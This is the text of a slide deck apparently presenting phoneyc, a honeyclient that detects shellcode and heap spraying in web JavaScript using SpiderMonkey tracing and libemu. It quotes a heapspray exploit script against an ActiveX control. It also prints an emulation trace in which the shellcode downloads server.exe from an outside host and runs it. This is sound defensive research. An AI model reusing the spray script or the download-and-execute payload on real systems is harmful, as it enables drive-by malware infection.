SlideShare une entreprise Scribd logo

Shellcode and heapspray detection in phoneyc

Z Chen
Z Chen
TechnologieArt & Photos
1  sur  31
Télécharger pour lire hors ligne
phoneyc with libemu Z. Chen phoneyc WB Malware . . Libemu Shellcode and heapspray detection in phoneyc Tracing JS . .. . . Basic Principles SCDetection Basic Idea Details Zhijie Chen1 Source Files Implementation 1 Honeynet Project Chinese Chapter HS Detection Current Results Honeynet Project on Google Summer of Code, 2009 JoYAN . . . . . .
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 2
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 3
Introduction to phoneyc phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS http://code.google.com/p/phoneyc/ Basic Principles SCDetection A python honeyclient Basic Idea Details Original written by Jose Nazario. Source Files Implementation To detect Web-based Malware HS Detection Current Results JoYAN 4
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 5
A Typical Heapspray Mal-javascript I phoneyc with libemu 1 <body> Z. Chen <script>window.onerror=function(){return true;}</script> phoneyc <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style=’display:none’ id=’target’></object> WB Malware <SCRIPT language="javascript"> Libemu 6 var shellcode = unescape("%u9090"+"%u9090"+ Tracing JS ...(shellcode) Basic Principles "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672 SCDetection Basic Idea %u7265%u652e%u6578%u0000"); Details </script> Source Files Implementation <SCRIPT language="javascript"> HS Detection 11 var bigblock = unescape("%u9090%u9090"); Current var headersize = 20; Results var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); 16 block = bigblock.substring(0, bigblock.length−slackspace); while(block.length+slackspace<0x40000) JoYAN block = block+block+fillblock; 6
A Typical Heapspray Mal-javascript II phoneyc with libemu memory = new Array(); Z. Chen for (x=0; x<100; x++) memory[x] = block +shellcode; 21 var buffer = ’’; phoneyc while (buffer.length < 1024) buffer+="x05"; WB Malware var ok="1111"; Libemu target.Register(ok,buffer); Tracing JS </script> Basic Principles 26 </body> SCDetection Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 7
Heap Status After Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles | More than ??MB 0x90(NOP)s or some other x86 instructions SCDetection Basic Idea as a sledge | Shellcode | Details Source Files Implementation HS Detection Current Results JoYAN 8
Detecting Shellcode/Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Tool: How To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 9
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 10
Introduction to libemu phoneyc with libemu Z. Chen . phoneyc From it’s official site: . WB Malware .. libemu is a small library written in c offering basic x86 Libemu emulation and shellcode detection using GetPC heuristics. Tracing JS Basic Principles Using libemu one can: SCDetection Basic Idea detect shellcodes Details Source Files execute the shellcodes Implementation HS Detection . profile shellcode behaviour .. . . Current Results Using libemu to detect shellcode and heapspray in web-based malware: ¡¡Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks¿¿) JoYAN 11
Detecting x86 Instructions phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Time: When To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 12
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 13
Introduction to spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS What is SpiderMonkey? . Basic Principles .. SCDetection SpiderMonkey is the code-name for the Mozilla’s C Basic Idea Details implementation of Source Files Implementation JavaScript.(http://www.mozilla.org/js/spidermonkey/) . .. . . HS Detection Current Results JoYAN 14
Basic Principles of Spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu All the javascript sources are compiled into js bytecodes. Tracing JS Basic Principles There is an interpreter who interprets the bytecodes and SCDetection Basic Idea do certain simple actions. Details Source Files All the javascript variables are stored as jsval. Implementation HS Detection Some of the values are store as an “atom”, such as strings. Current Results JoYAN 15
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 16
Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS As both the shellcode manipulation and the spraying of the Basic Principles fillblock involve assignments. The shellcode will be detected SCDetection Basic Idea immediately on it’s assignment if we are able to interrupt Details Source Files spidermonkey at the interpretion of certain bytecodes related to Implementation an assignment and check its argments and values for shellcodes. HS Detection Current Results JoYAN 17
Details I phoneyc with libemu Z. Chen The following js codes: phoneyc function a(){b="c"; var a = 0;} WB Malware Libemu are compiled into bytecodes like: Tracing JS Basic Principles 00000: bindname "b" SCDetection 00003: string "c" Basic Idea 00006: setname "b" Details Source Files 4 00009: pop Implementation 00010: zero HS Detection 00011: setvar 0 Current 00014: pop Results 00015: stop So, if we examine the set* opcodes’ arguments on the top of the stack in runtime, shellcodes won’t get passed! JoYAN 18
Details phoneyc with libemu Z. Chen phoneyc To do so, we need to: WB Malware Libemu Step trace the spidermonkey runtime. Tracing JS Stop at the key bytecodes (such as setname, setvar, Basic Principles SCDetection setprop, setarg etc.) on all kinds of Basic Idea Details assignments.Unfortunately different assignments have Source Files Implementation different bytecode accordingly. HS Detection But all the opcodes related to assignments share a Current JOF SET bit in their opcode description Results structure(./src/jsopcode.h). JoYAN 19
Related Source files to be used later phoneyc with libemu Z. Chen phoneyc WB Malware Libemu jsapi.h:Basic APIs for javascript execution. Tracing JS Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey. SCDetection Basic Idea jsopcode.tbl:All the js opcodes(bytecodes). Details Source Files Implementation jsinterp.c:You can find how each bytecode is interpreted HS Detection here. Current Results JoYAN 20
Implementation phoneyc with libemu Z. Chen Register a trace handler into spidermonkey using phoneyc JS SetInterrupt. This handler will be called at each step WB Malware of the bytecode execution. Libemu In the handler: Tracing JS Use JS GetTrapOpcode to get current Basic Principles opcode(bytecode). SCDetection Basic Idea Use JS FrameIterator to get current runtime stack. Details Check the rvalue of the set* bytecodes on the top of the Source Files Implementation stack with libemu. HS Detection Dump the shellcodes and alert. Current Contine the execution. Results Privide this traced js virtual as a python module named honeyjs, so other part of phoneyc can use this module just the same as python-spidermonkey with optional awareness of the extra shellcode/heapspray detection APIs. JoYAN 21
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 22
Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS Heapspray . Basic Principles .. A myriad of NOP-like x86 instructions SCDetection Basic Idea Details Accumulating through a loop of assignments Source Files Implementation . Shellcode in the end of each sledge .. . . HS Detection Current Results JoYAN 23
Basic Idea phoneyc with libemu Z. Chen phoneyc . Heapspray . WB Malware .. Libemu A myriad of NOP-like x86 instructions Tracing JS Accumulating through a loop of assignments Basic Principles SCDetection . Shellcode in the end of each sledge .. . . Basic Idea Details Source Files . Implementation Detection . .. HS Detection Now: A variable counter to record the mal-assignments Current Results (assignments containing shellcode in the r-value). . In the future: entropy ? the nozzle way? .. . . JoYAN 24
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 25
A Run on ssreader 0day.html I phoneyc with libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh Z. Chen 2 HONEYCLIENT MODULE TEST fetching http://172.31.25.227/phoneyc/ssreader 0day.html phoneyc [] WB Malware ==> http://172.31.25.227/phoneyc/ssreader 0day.html Libemu JS EVAL Tracing JS 7 Executing Javascript: Basic Principles DEBUG: !!!SC DETECTED at 141847268=141847572size:374 SCDetection DEBUG: !!!SC DETECTED at 141847524=141847756size:32728 Basic Idea Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 Source Files Implementation DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 HS Detection 12 ... Current Results DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 SSReader Pdg2 Register method overflow 17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1 Runing shellcode... offset:248 JoYAN DEBUG: Begin analyzing ... DEBUG: download http://1v1.name/server.exe −> 26
A Run on ssreader 0day.html II phoneyc with libemu Z. Chen c:WINDOWSsystem32a.exe phoneyc 22 WB Malware ... Libemu Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server. Basic Principles exe’] SCDetection Done Basic Idea Details 27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1 Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT: Implementation 100 HS Detection VBS EVAL IFRAMES [] Current Results HREFS [] FRAMES [] 32 IMAGES [] JoYAN 27
Analysis of The Shellcode using libemu I phoneyc with libemu FARPROC WINAPI GetProcAddress ( Z. Chen HMODULE hModule = 0x7c800000 => 3 none; phoneyc LPCSTR lpProcName = 0x0041710c => WB Malware = "GetSystemDirectoryA"; Libemu ) = 0x7c814eea; Tracing JS FARPROC WINAPI GetProcAddress ( Basic Principles 8 HMODULE hModule = 0x7c800000 => SCDetection none; Basic Idea Details LPCSTR lpProcName = 0x00417120 => Source Files Implementation = "WinExec"; HS Detection ) = 0x7c86136d; Current 13 FARPROC WINAPI GetProcAddress ( Results HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417128 => = "ExitThread"; 18 ) = 0x7c80c058; JoYAN FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => 28
Analysis of The Shellcode using libemu II phoneyc with libemu none; Z. Chen LPCSTR lpProcName = 0x00417133 => 23 = "LoadLibraryA"; phoneyc ) = 0x7c801d77; WB Malware HMODULE LoadLibraryA ( Libemu LPCTSTR lpFileName = 0x00417140 => Tracing JS = "urlmon"; Basic Principles 28 ) = 0x7df20000; SCDetection FARPROC WINAPI GetProcAddress ( Basic Idea Details HMODULE hModule = 0x7df20000 => Source Files none; Implementation LPCSTR lpProcName = 0x00417147 => HS Detection 33 = "URLDownloadToFileA"; Current ) = 0x7df7b0bb; Results UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe5f => none; 38 UINT uSize = 32; ) = 19; JoYAN HRESULT URLDownloadToFile ( 29
Analysis of The Shellcode using libemu III phoneyc with libemu Z. Chen LPUNKNOWN pCaller = 0x00000000 => phoneyc none; WB Malware 43 LPCTSTR szURL = 0x0041715a => Libemu = "http://1v1.name/server.exe"; Tracing JS LPCTSTR szFileName = 0x0012fe5f => Basic Principles = "c:WINDOWSsystem32a.exe"; SCDetection DWORD dwReserved = 0; Basic Idea Details 48 LPBINDSTATUSCALLBACK lpfnCB = 0; Source Files ) = 0; Implementation UINT WINAPI WinExec ( HS Detection LPCSTR lpCmdLine = 0x0012fe58 => Current Results = "cmd /c c:WINDOWSsystem32a.exe"; 53 UINT uCmdShow = 0; ) = 32; JoYAN 30
phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS . Thank you! . Basic Principles SCDetection Basic Idea Details .. .. . . Source Files Implementation HS Detection Current Results JoYAN 31

Recommandé

Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionGeorg Wicherski
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAbhineet Ayan
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode ExecutionRyan Wincey
 

Recommandé

Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionGeorg Wicherski
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAbhineet Ayan
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode ExecutionRyan Wincey
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Software Exploits
Software ExploitsSoftware Exploits
Software ExploitsKevinCSmallwood
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit developmentDan H
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeSam Bowne
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 

Contenu connexe

En vedette

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit developmentDan H
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeSam Bowne
 

En vedette (19)

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Software Exploits
Software ExploitsSoftware Exploits
Software Exploits
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
 

Similaire à Shellcode and heapspray detection in phoneyc

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 

Similaire à Shellcode and heapspray detection in phoneyc (6)

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentation
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 

Dernier

